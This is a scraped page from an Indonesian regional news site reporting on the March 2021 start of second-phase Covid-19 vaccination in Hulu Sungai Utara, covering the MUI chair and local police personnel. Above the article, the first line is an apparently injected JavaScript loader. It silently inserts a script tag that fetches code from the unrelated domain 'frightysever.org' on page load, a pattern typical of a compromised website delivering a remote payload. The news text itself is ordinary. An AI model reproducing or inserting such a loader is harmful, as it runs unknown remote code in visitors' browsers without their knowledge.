(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Vaksinasi Tahap II Dimulai, Ketua MUI dan Anggota Polres HSU Disuntik


KANALKALIMANTAN.COM, AMUNTAI – Mengawali vaksinasi Covid-19 tahap dua, Pemerintah Kabupaten Hulu Sungai Utara (HSU) menggelar serentak proses vaksinasi di sejumlah fasilitas kesehatan di Kabupaten HSU, Senin (8/3/2021).

Dari pantauan Kanalkalimantan.com, kegiatan vaksinasi berlangsung serentak di sejumlah Puskesmas, seperti di Puskesmas Haur Gading.

Sejumlah tokoh masyarakat mengikuti vaksinasi, diantaranya Ketua MUI HSU KH Said Masrawan Lc.

Kepala Puskesmas Haur Gading dr Yenny Kusuma Dewi mengatakan, sejak pagi hari pihaknya sudah menerima sejumlah peserta vaksinasi, salah satunya dari Ketua MUI HSU.

 

Anggota Polres HSU diberikan vaksin secara bertahap selama tiga hari, Senin (8/3/2021). Foto: dew

Menurutnya, kedatangan ketua MUI Kabupaten HSU merupakan bentuk dukungan langsung atas program vaksinasi ini.

“Adanya beliau, ini sangat mendukung program vaksinasi,” ujar dr Yenny.
Ia berharap vaksinasi tahap kedua ini berjalan dengan lancar, seperti yang tahap pertama kemarin yang pencapaian hampir 100 persen.

“Vaksin tahap pertama (nakes) dosis satu capaian kita 100 persen, sosis duanya masih berjalan sementara 69 persen,” pungkasnya.

Selain di Puskesmas, vaksinasi juga dilaksanakan di klinik Polres HSU, sedikitnya 395 personil akan menjalani vaksinasi secara bergilir.

Kapolres HSU AKBP Afri Darmawan SIK MH mengatakan, anggota Polres HSU diberi vaksin mulai Senin (8/3/2021), sebagai upaya mencegah penyebaran Covid 19.

“Vaksinasi di klinik Pratama Polres HSU selama 3 hari, tahap pertama hari ini menargetkan sebanyak 70 personil. Dua hari berikutnya dilanjutkan, sehingga semua anggota Polres HSU baik ASN dan PHL dengan jumlah semua 395 orang,” ujar Kapolres HSU.

Anggota Polsek jajaran Polres Polres HSU untuk pemberian vaksin sinovac pelaksanaannya di Puskesmas kecamatan masing-masing.

“Semoga dengan antibodi sistem kekebalan tubuh semua anggota Polres HSU bisa mencegah virus masuk ke dalam tubuh, Jika kita menerima vaksin, otomatis tubuh akan terlindungi dari serangan virus,” terangnya.

Selain itu, kata Kapolres melalui vaksinasi ini sekiranya dapat membantu mengurangi penyebaran virus corona dan untuk melindungi orang-orang di sekitar.

“Masyarakat jangan takut disuntik vaksin sinovac ini. Vakisinasi upaya mencegah penyebaran Covid-19 di HSU, sehingga dapat beraktivitas secara normal,” tutup Kapolres. (kanalkalimantan.com/dew)

Reporter : dew
Editor : kk


Al Ghifari

Recent Posts

KPU Banjarbaru Mulai Siapkan Pembentukan Badan Ad-hoc Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Komisioner Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima beberapa catatan menjelang pembentukan… Read More

4 jam ago

Raperda Inisiatif Sistem Drainase Tawaran Solusi Banjir dan Genangan Air di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Persoalan banjir dan genangan air masih menjadi pekerjaan rumah (PR) yang hingga… Read More

5 jam ago

Upaya Meningkatkan Akreditasi Perpustakaan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Kearsipan dan Perpustakaan Daerah (Darpusda) Kota Banjarbaru menggelar sosialisasi pembinaan perpustakaan… Read More

6 jam ago

Cabang Musabaqah Syarhil Qur’an Kafilah HSU Putra Putri Lolos ke Final

KANALKALIMANTAN.COM, RANTAU - Hari ketiga Musabaqah Tilawatil Quran (MTQ) Nasional XXXV tingkat Provinsi Kalimantan Selatan… Read More

6 jam ago

65 Peserta Calon Guru Penggerak di Kabupaten Banjar Ikuti Lokakarya

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur mengingatkan para tenaga pengajar bahwa yantangan di… Read More

7 jam ago

Bupati Banjar Buka Temu Teknis Penyuluh Pertanian se Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur membuka Temu Teknis Penyuluh Pertanian se Kabupaten… Read More

7 jam ago

This website uses cookies.